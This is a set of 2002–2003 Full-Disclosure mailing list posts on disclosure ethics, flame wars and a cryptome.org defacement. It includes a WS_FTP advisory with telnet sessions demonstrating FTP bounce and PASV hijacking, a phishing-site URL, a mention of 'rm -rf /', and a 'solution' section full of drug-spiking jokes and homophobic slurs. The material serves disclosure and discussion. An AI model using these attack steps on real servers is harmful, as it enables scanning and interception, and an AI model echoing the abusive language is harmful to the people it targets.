Re: [Full-Disclosure] SPAM, credit card numbers, what would you do?
On Wed, 2003-10-15 at 03:33, Cael Abal wrote: > A number of 'hackers' recently in the news did their 'hacking' via web > browsers -- just like you. It could likely be successfully argued by a > prosecutor that you intentionally stole this credit card data. Yes, I > know it was a via clickable link and the site was ridiculously > unsecured, but that probably wouldn't make a difference to a court. How is 'hacking' defined where you are? In Australia (at least in NSW), and some other places, an access control mechanism of some description has to be circumvented for it to be an offence. ___ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html
Re: [Full-Disclosure] FW: Last Microsoft Patch
On Thu, 2003-10-16 at 14:14, Exibar wrote: > Well, I was able to verify his GSEC. By far the easiest of the certs he's > listed to attain. > > You would think that with at least a verified GSEC cert, that he would have > been able to recognize what that message really was I would have almost > bet money that ANY CISSP would be able to tell what that message really > was. I'd certainly hope so. > ok, ok, even with a million certs you're still not expected to know > everything but sheesh even my wife knows what that message really was > and she "only" has a bachelor's degree! What about a high school student with no certifications, who could see what the messages clearly were, such as myself? ___ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html
[Full-Disclosure] Re: Administrivia: Poll
I find it interesting that nobody has mentioned the obvious solution. Keep this list unmoderated, and create a second list, full-disclosure-moderated, that consists of moderated posts to the original list. All we need is a listserver and people willing to moderate. Dave Aitel of ImmunitySec started up just such a list after a similar spate of OT activity last summer, but it seems to have disappeared. Anybody else willing to take up the reigns? -- This message has been sent via an anonymous mail relay at www.no-id.com. ___ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html
[Full-Disclosure] [Full Disclosure] Ebay Spoof
8675309.012webpages.com/zin/index.php -- This message has been sent via an anonymous mail relay at www.no-id.com. ___ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html
[Full-Disclosure] [Full Disclosure] re: RPC - COM event Error
>[EMAIL PROTECTED] >hope the helps: >--- [snip] No dumbass; unless you consider that a 0day too lmao. You're just a fucking lamer, XSS yourself for a while and stay the fuck away from what was once a serious list but now it's scriptkiddie heaven. -- This message has been sent via an anonymous mail relay at www.no-id.com. ___ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html
[Full-Disclosure] RE: Miatrade Guestbook - Persistant XSS
And the XXS Lamer king strikes again *sigh* I'm not sure if I can take all that 1337 XXS stuff, donnie wiener can you please please please pretty please write a whitepaper about those 1337 skillz you surely must have? I'm particulary interested in exactly how you find those highly secret bugs in applications and how you go and exploit them. -- This message has been sent via an anonymous mail relay at www.no-id.com. ___ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html
[Full-Disclosure] RE: Miatrade Guestbook - Persistant XSS
>How about using google to find some of those papers already >written >about XSS? This wouldn't be too 1337, right? That was sarcasm dude, get a brain. A 12 year old infant could 'discover' XSS 'holes' in stuff. I'm just getting tired of seeing wiener's shit "0days" on this list. He has it's own, so why doesn't he stays there and leave us alone. Noone cares about another lame XSS.. Worst part is he really thinks he's somebody and don't give me that crap "at least he's contributing". I will contribute too: - Windows security hole - [...] If you press F8 on boot you'll get a secret menu. Fix: no fix on 0day [...] there, I contributed too. -- This message has been sent via an anonymous mail relay at www.no-id.com. ___ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html
[Full-Disclosure] Re: MS-02-052
Does anybody else find it disturbing that today's JVM patch can only be installed through Windows Update, and the Windows Update site now attempts to install an unsigned control (http://v4.windowsupdate.microsoft.com/CAB/x86/unicode/iuctl.cab) after informing the user to "click Yes on any Security Warnings that pop up"? -- This message has been sent via an anonymous mail relay at www.no-id.com. ___ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html
Re: [Full-Disclosure] Re: MS-02-052
(I am the original poster of this thread) My main problem was that the only place to obtain the patch attempted to d/l and install an *unsigned* ActiveX control that is required to use Windows Update. Microsoft, it seems, have quietly replaced this with a signed control (however, the chain of trust only goes up to Microsoft Root Authority.) The real nut-kicker in all this is the text on the Windows Update page that tells the user to "select YES in any "Security Warning" dialog boxes that appear". Since the dialog to install a control always has a title of "Security Warning" whether the control is signed or not, Microsoft's instructions circumvent the whole point of code signing. I still have no idea whether the unsigned control of 2 days ago was legitimate or a trojan (I chose not to install it), and presumably MS isn't going to tell us. -- This message has been sent via an anonymous mail relay at www.no-id.com. ___ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html
[Full-Disclosure] www.msnbc.com
www.msnbc.com shows internal ip addresses in html source. Go to www.msnbc.com and take a look at the top of the source, reload to get another an so on. NoName. -- This message has been sent via an anonymous mail relay at www.no-id.com. ___ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html
[Full-Disclosure] RE: 7350reass (who's responsible)
k wasnt meant to go outside darknet ;) heheh maybe we should let everyone run it no.. it will come back to us i could post a half-assed analysis with warning yes that would be nice btw, is there a genuine bug like that? :) yes im afraid so ;) it isnt as easy to exploit as that trojan appeared a lot more work is involved and its still being perfected ;) hm all BSD? yes but only openbsd has been worked on now openbsd also has a pf bug of? pf* yes -- This message has been sent via an anonymous mail relay at www.no-id.com. ___ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html
[Full-Disclosure] IPSwitch, Inc. WS_FTP Server
-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1
Product: IPSwitch, Inc. WS_FTP Server
Versions: v3.13 (dated 2002.08.07), possibly others.
Severity: Medium-Hot
Author:low halo <[EMAIL PROTECTED]>
Date: October 25th, 2002
Revision: 1.0
{ Overview }
WS_FTP v3.13 by IPSwitch, Inc., is vulnerable to the classic FTP bounce
attack as well as PASV connection hijacking.
{ Impact }
The FTP bounce vulnerability allows a remote attacker to cause the FTP
server to create a connection to any IP address on any TCP port greater than
1024. Thus, the attacker can scan Internet addresses anonymously along with
any internal addresses that the FTP server has access to. More information
on this vulnerability can be found here:
http://www.cert.org/advisories/CA-1997-27.html.
The PASV connection hijacking vulnerability allows a remote attacker to
intercept directory listings and file downloads from other users; file uploads
may also be spoofed. No authentication is necessary to execute this attack.
More information on this vulnerability can be found here:
http://www.kb.cert.org/vuls/id/2558.
{ Details }
This demonstrates the FTP bounce vulnerability. The internal IP address,
"192.168.1.20", is listening on port 8080, and "192.168.2.30" is dead or not
accessible via port 8080:
$ telnet x.ternal.ip.address 21
Trying x.ternal.ip.address...
Connected to x.ternal.ip.address.
Escape character is '^]'.
220-lh1 X2 WS_FTP Server 3.1.3.EVAL (696969696)
220-Sun Jun 04 00:00:00 1989
220-27 days remaining on evaluation.
220 lh1 X2 WS_FTP Server 3.1.3.EVAL (969696969)
USER lowhalo
331 Password required
PASS el_ach
230 user logged in
PORT 192,168,1,20,31,144
200 command successful
LIST
150 Opening ASCII data connection for directory listing
226 transfer complete
PORT 192,168,2,30,31,144
200 command successful
LIST
425 Can't open data connection.
This demonstrates the PASV connection hijacking vulnerability:
$ telnet x.x.x.x 21
Trying x.x.x.x...
Connected to x.x.x.x.
Escape character is '^]'.
220-lh1 X2 WS_FTP Server 3.1.3.EVAL (696969696)
220-Sun Jun 04 00:00:00 1989
220-27 days remaining on evaluation.
220 lh1 X2 WS_FTP Server 3.1.3.EVAL (969696969)
USER lowhalo
331 Password required
PASS el_ach
230 user logged in
PASV
227 Entering Passive Mode (192,168,1,1,4,23).
LIST
150 Opening ASCII data connection for directory listing
Next, from another IP address:
$ telnet x.x.x.x 1047
Trying x.x.x.x...
Connected to x.x.x.x.
Escape character is '^]'.
drwxr-x--- 2 lowhalo System0 Jan 0 00:00 .
drwxr-x--- 2 lowhalo System0 Jan 0 00:00 ..
- -rwxr-x--- 1 lowhalo System 1337 Jan 0 00:00 lh
Connection closed by foreign host.
{ Solution }
1.) Mix yourself a Long Island Iced Tea.
2.) Buy more Rohypnol from Paco on 7th & 30th ('cuz you used up the
box you bought last time to get yourself out of that chicken-
suit bind last Wednesday, remember??).
3.) While you're not looking, slip yourself two (2) crushed 100mg pills.
4.) Drink your Long Island while pretending to be flirting with someone
in a bar environment (but in fact, you're still in your lonely,
lonely apartment because you're a fucking looser and you're gonna
die alone 28 years from now).
5.) Put on those crotchless leather pants that you got in your closet.
But this time, don't wear anything underneath. Not even
underwear.
6.) Go to the local gay bar, even though you're not gay, and wait
outside 'till that warm fuzzy roofies feeling starts crawling up
your back.
7.) Go inside the bar and look for the menacing black biker guy named
Steve (Hey, how did you know his name is Steve if you're not
gay, huh??). Take the deepest breath you can and scream at the
top of your lungs every homosexual slur that you can think of
right in the guy's face.
8.) Wake up 16 hours later at the bottom of a ditch in a pool of your
own blood with that, "uh-oh, I think I forgot my jacket at the
bar" feeling.
9.) Try to figure out exactly what happened, and LAUGH YOUR ASS OFF
when you do.
10.) Die alone 28 years from now, you fucking looser.
(Yeah, so anyways, IPSwitch never got back to me after two weeks, so
there is no solution to this problem.)
{ Conclusion }
A big huge shout-out goes to HACKTIVISMO (http://www.hacktivismo.com/)!!
You guys have a lot to be proud of.
And here's a quote I'd like all those iDEFENSE research contributors to
read:
"Few men have the virtue to withstand the highest bidder."
- George Washington
low halo <[EMAIL PROTECTED]>
Defender of Truth and Liberty
http://pgp.mit.edu:11371/pks/lookup?op=get&search=0x9BFD99BF
58CE 3215 226A 69ED 4D20 4044 C925 54F9 9BFD 99BF
-BEGIN PGP SIGNATURE
[Full-Disclosure] Oracle Security Contact
-BEGIN PGP SIGNED MESSAGE- Hash: SHA1 Could someone please give me the security contact address for Oracle Corporation? It seems as though their marketing department's "Unbreakable" slogan makes them think that its OK to bury their security advisories & contact info deep within their site somewhere. Hey iDEFENSE: wanna buy this Oracle advisory from me for $3,000??? Oh wait! ITS NOT FOR SALE!~#@$!!@ HAHAHAHAHAHAHAHAHAHAHAHAHAHAHAHAHAHAHA HAHAHAHAHAHAHAHAHAHAHAHAHAHAHAHAHAHAHAHAHAHAHAHAHAHAHAHAHAHAHAHAHAHAHAHAHA HAHAHAHAHAHAHA!@!#!$$#!#!@! (damn, that was funny!) Seriously, though: I need their contact info ASAP. Thanks. low halo <[EMAIL PROTECTED]> Defender of Truth and Liberty http://pgp.mit.edu:11371/pks/lookup?op=get&search=0x9BFD99BF 58CE 3215 226A 69ED 4D20 4044 C925 54F9 9BFD 99BF -BEGIN PGP SIGNATURE- Version: GnuPG v1.2.0 (GNU/Linux) iD8DBQE9yDc5ySVU+Zv9mb8RAl9sAJ9Td7EL7r10NZ/BoC/dozbLlQe4HQCdEOwr Py6aWfC289Y9s/j74Vca7NA= =O56O -END PGP SIGNATURE- -- This message has been sent via an anonymous mail relay at www.no-id.com. ___ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html
[Full-Disclosure] Ron Dufresne rears his head again (was: security industry under scrutiny)
> The main point behind the rants of these lame kids is that > once their > little hacks and sploit tools are well known and defended Lame kids... *Their* sploit tools... Aren't we a walking bundle of contradiction? I agree that it may piss off some "blackhats" when XXX bug finds its way onto the security lists 2-3 years later, but to say that attacks are well known and defended against means not only the end of the computer underground, but the end of the security industry. I imagine heavenly security professionals such as yourself wouldn't want this scenario to transpire. In summary, the lame kids sending winternet spools and home directories around EFNet may get really pissed off when they can no longer compromise computer security, but their loss in mental stimulation is pale in comparison to your monetary losses when Secure Internet puts the security industry out of business. It really irks me that a former member of the G-Force Pakistan defacing group has the hide to denounce other clueless kidiots. -- This message has been sent via an anonymous mail relay at www.no-id.com. ___ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html
[Full-Disclosure] full disclosure discussion
There was a discussion about full-disclosure over at slashdot yesterday. "http://slashdot.org/articles/02/11/19/174214.shtml?tid=128"; -- This message has been sent via an anonymous mail relay at www.no-id.com. ___ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html
[Full-Disclosure] the sides of security(a 0day post)
The sides of security. I enjoy the all the conversation over this list, although a majority of the points expressed by sockz and democow are valid and I agree to most of what they say I have to say that the quality of their arguments are low. I think this is having a negitive effect on the true points which they are trying to express. Put some well thought out arguments on why/how the sec.industry should change and you will be much more productive. Marcus ranum has an excellent website full of great stuff - http://ranum.com/pubs/index.shtml (I also use this site as an example of someone keeping the sec industry in check while not being blackhat). Another great resource with very well thought out arguments on discloser/sec.industry would be the old anti.security.is site and message board. Avaliable at http://web.archive.org/web/20010923032408/http://anti.security.is/ (down atm). Anyways, the point I will try to make in this post is that of how the topic of computer security has became so large. I am sure with some good research, thinking, and detication someone could come up with a very insiteful paper on this. What draws people to computer security? This is a broad question, but basicly the way I see it is that computer security is an exciting feild, not many will deny this. Some see security as the most cool computer subject. Some see it as the most fun. Some see it as the most challenging. Some see it as the most profitable. The ones who see it as cool usually are seeking fame. Although I feel it is ok to take credit for things you do, one must put a limit on how far they are willing to sell out, damage systems/people, or just do unethical things. Once you start releasing exploits and vuln info to the public (or wide range of friends/underground) you must relise the effects this has on thousands of people worldwide. Is it worth giving people the power to cause millions of dollars of damage just to see your name in lights and have a few people think you are cool? People who see security as fun or challenging are fine, aslong as this fun stays in check. rm -rf / might be fun for some. Others writting a firewall might be fun. This is a personal decision, and others should not judge. Just because you do not agree with someone else's ethics does not mean you should try to force yours apon them. State you opinions and perhaps they will change their mind. Everyone evolves. I used to be full-discloser, after information, time, and thought I have changed to non-discloser. Perhaps one day I will change again (maybe "responcible" discloser). Basicly, let people do what they wish and you the same. ive got an idea. we should all just do whatever the fuck we want. fully disclose if one desires The people who truely desire any given subject will always dislike the shallow ones who are in it soley for the money. There will always be backstabbers, unethical, and sometimes downright bad people in business. It is the nature of this society at the current time. Keeping these people in check is hard to do. Should we be mad that some are cashing in on something which we do for the love of it? Sometimes I think yes, people are stealing ideas from other, spreading exploits, spamming their company name, and using other unethical methods to gain (force) employment. Othertimes I think back to "all just do whatever the fuck we want." and really don't give a shit if these people are making money, I'll just keep doing what I like to do and will put in measures so that they cannot profit (as much) off of me. Suggestions to prevent people from getting into security: Cool/Fame - Take away full discloser. Make fun of them. Make it commone knowledge that those who do not disclose can/are more cool than those who do. Suggest other ways to be cool, to get famous, or to prove how smart they are instead of whoring code and vuln info. Fun/Challenging - Take away the fun of it. If they are blackhat lock down networks or leave them so open it takes away the challenge of getting into them. Give them no reason to attack you - flaming people who are willing to cause harm is usually not a great idea. If they are whitehat then don't attack anything and they will not have fun protecting it. I suggest the best thing for people who really dislike the security industry to do is to just quit security all together. There is no way to damage them while you are attacking or defending computers. Espechially if you are attacking, this is creating business for them. Often times people find no fun in something no one else cares about. If you ignore people sooner or later they will generally quit doing what they are doing. If you give things to people without putting up a challenge it is often no fun. Part of the fun is the reward from proving that you could do something (get into a computer or protect a computer). Money - Don't attac
[Full-Disclosure] cryptome.org hacked by bighawk of hackweiser
~~ th3 cryptome.org d3f4c3m3nt ~~ th3 c0nsp1r4cy th30rist [PHC] hi. as you know already cryptome.org was defaced 2/26/03. the defacement stated: hacked by bighawk of hackweiser ([EMAIL PROTECTED]) later this same bighawk sent email to the cryptome maintaner, denying any involvement in the hack. his initial (published) mail can be read at: http://cryptome.org/cryptome-hack.htm in it our hero (bighawk) states: "Since a few months, a few individuals have been constantly trying to bring me into discredit. I believe this was their next step. Until now these attempts were relatively innocent and could be easily ignored. criminal actions as these i did not expect." ok since most of the people reading this don't understand wtf bighawk is talking about, let me elaborate. for some time people have been somewhat tolerant of this blowhard's egotistical ranting and criticism of others (who are often much more technically skilled and much better looking than the very unattractive Jogchem), until at some point people got sick of him and told him he needed to shut up. since this time, almost every statement made by bighawk on ircsnet has initiated brutal verbal (well, at least typed) ownage of bighawk. bighawk feels he has a lot to prove to the world. why is this, you ask? first let us examine the following urls to defacements of bighawk: http://safemode.org/mirror/2000/08/26/www.goldenvillage.com/ http://safemode.org/mirror/2000/08/26/www.post509.org/ http://safemode.org/mirror/2000/08/26/www.jmpmusic.ch/ these urls, along with others, are often pasted during conversations with the intentions of infuriating bighawk, because he is so ashamed of his previous actions as a scriptkid (or, as he would phrase it now, in his elegant speech -- a malevolent cracker) and would like to be acknowledged as no longer being lame, but as a full-fledged hacker. in his second published email on cryptome.org, derogatory labels are assigned to those "members" of the Phrack High Council that he listed; cracker is often used to described "less skilled" individuals -- he would like to be known as being better than those members of PHC. because of bighawk's past affiliations with cracking groups (World of Hell, HackWeiser, and recently Fluffy Bunny) he wishes to seperate his current actions from his previous, and to show off that he is no longer a "kid". bighawk likes to show off that he finally learned how to program. examples of his emerging programming abilites can be seen on the packetstorm site, i've gone ahead and listed a few links to some various stellar pieces of code (and various errata) that he has written. http://packetstormsecurity.org/0005-exploits/allmanage.pl.txt - brilliant advisory / exploit for a lame cgi http://packetstormsecurity.org/UNIX/utilities/ipgen.tgz - bighawk is learning perl, a scriptkiddie tool for generating ip lists, to be used by scriptkiddies for scriptkiddie purposes http://packetstormsecurity.org/UNIX/utilities/ipgenv2.tar.gz - an updated, more robust version of the previous http://packetstormsecurity.org/UNIX/misc/squirtv1.2.tar.gz - lame perl tool for local stress testing / automated exploitation (known to have never once worked, but bighawk is learning how some of those exploits gov-boi gives him work) i would have liked to have shown you some examples of his "look i read a phrack article on writing shellcode and wrote my own based off the examples" shellcodes, but because of continual ridicule he has removed the links on his website to them, and i really can't be bothered with searching for them. since he's now capable of writing shellcode after reading tutorials, and writing these nifty perl scripts he believes he is a hacker. recently our friend, the big hawk, has received some fame from his software "aesop" that was featured in some article by some guy from cisco or something. bighawk evolved into bigego, because his tool (designed for "bouncing" between those .kr mailservers he owned but didn't install apache on for defacing), to hide his online presence while hacking. ok so anyhow we need to get back to our conspiracy theories about the defacement and the big hawk. it was important to first establish some history of this criminal. bighawk isn't exactly well liked. he does have a big ego, thinking that certain people occasionally "picking on him" is a massive conspiracy agains him. anyhow, moving on . . . th30ry #1: bighawk is tired of being mocked for his past defacements and decides to deface cryptome.org in a way that he can easily disassociate from (it has my name on it, do you think i'd be that stupid?) and then can "frame" those who mock him so frequently for "framing him". a little farfetched? th30ry #2: crytome.org was defaced by a PHC sup
